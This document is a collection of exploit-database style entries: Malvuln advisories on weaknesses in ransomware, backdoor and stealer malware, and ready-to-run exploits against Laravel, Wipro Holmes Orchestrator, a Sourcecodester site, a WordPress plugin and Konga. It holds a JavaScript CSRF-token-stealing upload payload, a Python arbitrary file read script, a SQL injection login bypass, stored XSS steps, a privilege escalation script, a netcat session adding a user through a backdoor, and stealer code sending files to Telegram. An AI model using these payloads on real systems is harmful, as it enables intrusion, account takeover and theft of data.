<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/5dfa998f62612e10d5d28d26948dd50f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransomware Builder Babuk<br />Vulnerability: Insecure Permissions<br />Description: The malware creates directorys with insecure permissions when write to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 5dfa998f62612e10d5d28d26948dd50f<br />Vuln ID: MVID-2022-0461<br />Disclosure: 01/19/2022<br /><br /><br />Exploit/PoC:<br />C:\>builder.exe<br />Usage: builder.exe FolderName<br /><br />C:\>builder.exe c:\hate<br />Creating folder 'c:\hate'<br />curve25519 keys generated.<br />"c:\hate\e_win.exe" written!<br />"c:\hate\d_win.exe" written!<br />"c:\hate\e_esxi.out" written!<br />"c:\hate\d_esxi.out" written!<br />"c:\hate\e_nas_x86.out" written!<br />"c:\hate\d_nas_x86.out" written!<br />"c:\hate\e_nas_arm.out" written!<br />"c:\hate\d_nas_arm.out" written!<br />"c:\hate\kp.curve25519" written!<br />"c:\hate\ks.curve25519" written!<br />Press any key to continue . . .<br /><br />C:\>cacls \hate<br />C:\hate BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre style="position: relative;">
<code># Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux
# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
# Steps to reproduce:
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
2- Use code below to bypass csrf token
ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
console.log(xhr.responseText);
}
}
//
xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}
function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
// true on the end of here makes the call asynchronous
//Edit the path as you want
xhr.open("GET", "/image-upload", true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementsByTagName("input")[0];
// Show the token
alert("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}
getTokenJS();
var POST_URL="/"
getTokenJS();
</script>
</html>
3- Save it as Html file and upload it.
</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/57bda78cc5fd6a06017148bae28e8e39.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wisell<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP port 5277. Third-party attackers who can reach an infected system can run any OS commands further compromising the host. <br />Type: PE32<br />MD5: 57bda78cc5fd6a06017148bae28e8e39<br />Vuln ID: MVID-2022-0460<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 5277<br />WinShell v1.0 - '!' to quit, 'enter' to shell...<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\dump>net user HYP3RLINX 666 /add<br />net user HYP3RLINX 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC<br /># Date: 05/08/2021<br /># Exploit Author: Rizal Muhammed @ub3rsick<br /># Vendor Homepage: https://www.wipro.com/holmes/<br /># Version: 20.4.1<br /># Tested on: Windows 10 x64<br /># CVE : CVE-2021-38146<br /><br />import requests as rq<br />import argparse<br /><br />port = 8001 # change port if application is running on different port<br /><br />def file_download(host, filepath):<br /> vuln_url = "http://%s:%s/home/download" % (host, port)<br /> data = {<br /> "SearchString": filepath,<br /> "Msg": ""<br /> }<br /><br /> hdr = {<br /> "content-type": "application/json"<br /> }<br /><br /> resp = rq.post(vuln_url, headers=hdr, json=data)<br /><br /> print resp.text<br /><br />def main():<br /> parser = argparse.ArgumentParser(<br /> description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",<br /> epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"<br /> )<br /> parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)<br /> parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")<br /> args = parser.parse_args()<br /><br /> if "\\" in args.file_path:<br /> fp = args.file_path.replace("\\", "/")<br /> else:<br /> fp = args.file_path<br /> file_download(args.target_ip, fp)<br /><br />if __name__ == "__main__":<br /> main()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CollectorStealerBuilder v2.0.0 Panel<br />Vulnerability: Man-in-the-Middle (MITM)<br />Description: MITM vector exists as the CURL request used when sending data to "api.telegram.org/bot" has CURLOPT_SSL_VERIFYPEER set to false. CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine.<br />Type: WebUI<br />MD5: 54530f88c8e4f4371c9418f00c256b1d<br />MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)<br />Vuln ID: MVID-2022-0459<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />Vulnerable "collect.php" code snippet.<br /><br />$desc = "_________________________ \r\n\n🏴 IP: " . $ip . "\n🌐 Country: " . $country . "\n🏠 City: " . $city . "\n🔧 Build: ". $Build[1] . "\r\n_________________________ \n\n" . $desc; // Добавляем айпи и город<br />$url = "https://api.telegram.org/bot" . $token . "/sendDocument";<br />$document = new CURLFile(realpath($dest_path));<br />$ch = curl_init();<br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POST, 1);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, ["chat_id" => $chat_id, "document" => $document, "caption" => $desc]);<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type:multipart/form-data"]);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />$out = curl_exec($ch);<br />curl_close($ch);<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass<br /># Exploit Author: Daniel Haro (Dirox)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html<br /># Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html<br /># Version: Simple Subscription Website 1.0<br /># Tested on: Windows, xampp<br /># CVE: CVE-2021-43140<br /><br />- Description:<br />SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -<br /><br />PoC:<br /><br />POST /plan_application/Actions.php?a=login HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 57<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/plan_application/admin/login.php<br />Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3<br /><br />username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CollectorStealerBuilder v2.0.0 Panel<br />Vulnerability: Insecure Credential Storage<br />Description: The panel for Collector Stealer malware stores the login creds in plaintext in its MySQL database. Third-party attackers who gain access to the system can read the database username passwords without having to crack them offline.<br />Type: WebUI<br />MD5: 54530f88c8e4f4371c9418f00c256b1d<br />MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)<br />Vuln ID: MVID-2022-0458<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />--<br />-- phpMyAdmin SQL Dump<br />-- version 4.9.7<br />-- https://www.phpmyadmin.net/<br />--<br />-- Хост: localhost<br />-- Время создания: Фев 22 2021 г., 19:56<br />-- Версия сервера: 5.7.21-20-beget-5.7.21-20-1-log<br />-- Версия PHP: 5.6.40<br /><br />SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";<br />SET AUTOCOMMIT = 0;<br />START TRANSACTION;<br />SET time_zone = "+00:00";<br /><br /><br />/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;<br />/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;<br />/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;<br />/*!40101 SET NAMES utf8mb4 */;<br /><br />--<br />-- База данных: `jkrefsewer_1`<br />--<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Структура таблицы `Information`<br />--<br />-- Создание: Фев 19 2021 г., 11:04<br />-- Последнее обновление: Фев 22 2021 г., 16:54<br />--<br /><br />DROP TABLE IF EXISTS `Information`;<br />CREATE TABLE `Information` (<br /> `Build` text NOT NULL,<br /> `hash` text,<br /> `Date` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' ON UPDATE CURRENT_TIMESTAMP,<br /> `Country` text,<br /> `IP` text,<br /> `Cookies` int(11) DEFAULT NULL,<br /> `Passwords` int(11) DEFAULT NULL,<br /> `Cards` int(11) DEFAULT NULL,<br /> `Wallets` int(11) DEFAULT NULL,<br /> `Path` text<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8;<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Структура таблицы `users`<br />--<br />-- Создание: Фев 17 2021 г., 14:15<br />--<br /><br />DROP TABLE IF EXISTS `users`;<br />CREATE TABLE `users` (<br /> `id` int(11) NOT NULL,<br /> `username` varchar(45) COLLATE utf8_unicode_ci NOT NULL,<br /> `password` varchar(45) COLLATE utf8_unicode_ci NOT NULL<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;<br /><br />--<br />-- Дамп данных таблицы `users`<br />--<br /><br />INSERT INTO `users` (`id`, `username`, `password`) VALUES<br />(1, 'admin', 'admin');<br /><br />--<br />-- Индексы сохранённых таблиц<br />--<br /><br />--<br />-- Индексы таблицы `users`<br />--<br />ALTER TABLE `users`<br /> ADD PRIMARY KEY (`id`);<br /><br />--<br />-- AUTO_INCREMENT для сохранённых таблиц<br />--<br /><br />--<br />-- AUTO_INCREMENT для таблицы `users`<br />--<br />ALTER TABLE `users`<br /> MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;<br />COMMIT;<br /><br />/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;<br />/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;<br />/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 11/11/2021<br /># Exploit Author: Mohammed Aadhil Ashfaq<br /># Vendor Homepage: https://form2email.dwbooster.com/<br /># Version: 1.3.24<br /># Tested on: wordpress<br /><br />POC<br />1. Click Contact form to Email<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail<br />2. Create new form name with <script>alert(1)</script><br />3. Click Publish<br />4. XSS has been triggered<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687<br />5. Open a different browser, logged in with wordpress. Copy the URL and<br />Press enter. XSS will trigger.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/ca294b2f778abc14fef6313b3cea7155.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: VulturiBuilder<br />Vulnerability: Insecure Permissions<br />Description: The malware writes an .EXE with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: ca294b2f778abc14fef6313b3cea7155<br />Vuln ID: MVID-2022-0457<br />Disclosure: 01/19/2022 <br /><br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/11/2022 07:25 PM 298,496 hate.exe<br /> 1 File(s) 298,496 bytes<br /> 0 Dir(s) 27,531,624,448 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: KONGA 0.14.9 - Privilege Escalation<br /># Date: 10/11/2021<br /># Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)<br /># Vendor Homepage: https://github.com/pantsel/konga<br /># Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip<br /># Version: 0.14.9<br /># Tested on: Linux - Ubuntu 20.04.3 LTS (focal)<br /><br /><br /><br />import requests<br />import json<br /><br />urlkonga = "http://www.example.com:1337/" # change to your konga address<br />identifier = "usernormalkonga" # change user<br />password = "changeme" # change password<br /><br />headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", <br /> "Content-Type": "application/json;charset=utf-8", <br /> "connection-id": "", <br /> "Origin": urlkonga,<br /> "Referer": urlkonga<br />}<br /><br />url = urlkonga+"login"<br /><br />data = {<br /> "identifier":identifier,<br /> "password":password<br />}<br /><br />response = requests.post(url, json=data)<br />json_object = json.loads(response.text)<br />print("[+] Attack")<br />print("[+] Token " + json_object["token"])<br /><br />url2 = urlkonga+"api/user/"+str(json_object["user"]["id"])<br />id = json_object["user"]["id"]<br />print("[+] Exploiting User ID "+str(json_object["user"]["id"]))<br /><br />data2 = {<br /> "admin": "true",<br /> "passports": {<br /> "password": password,<br /> "protocol": "local"<br /> },<br /> "password_confirmation": password,<br /> "token":json_object["token"]<br />}<br /><br />print("[+] Change Normal User to Admin")<br />response2 = requests.put(url2, headers=headers, json=data2)<br />print("[+] Success")<br /> <br /></code></pre>
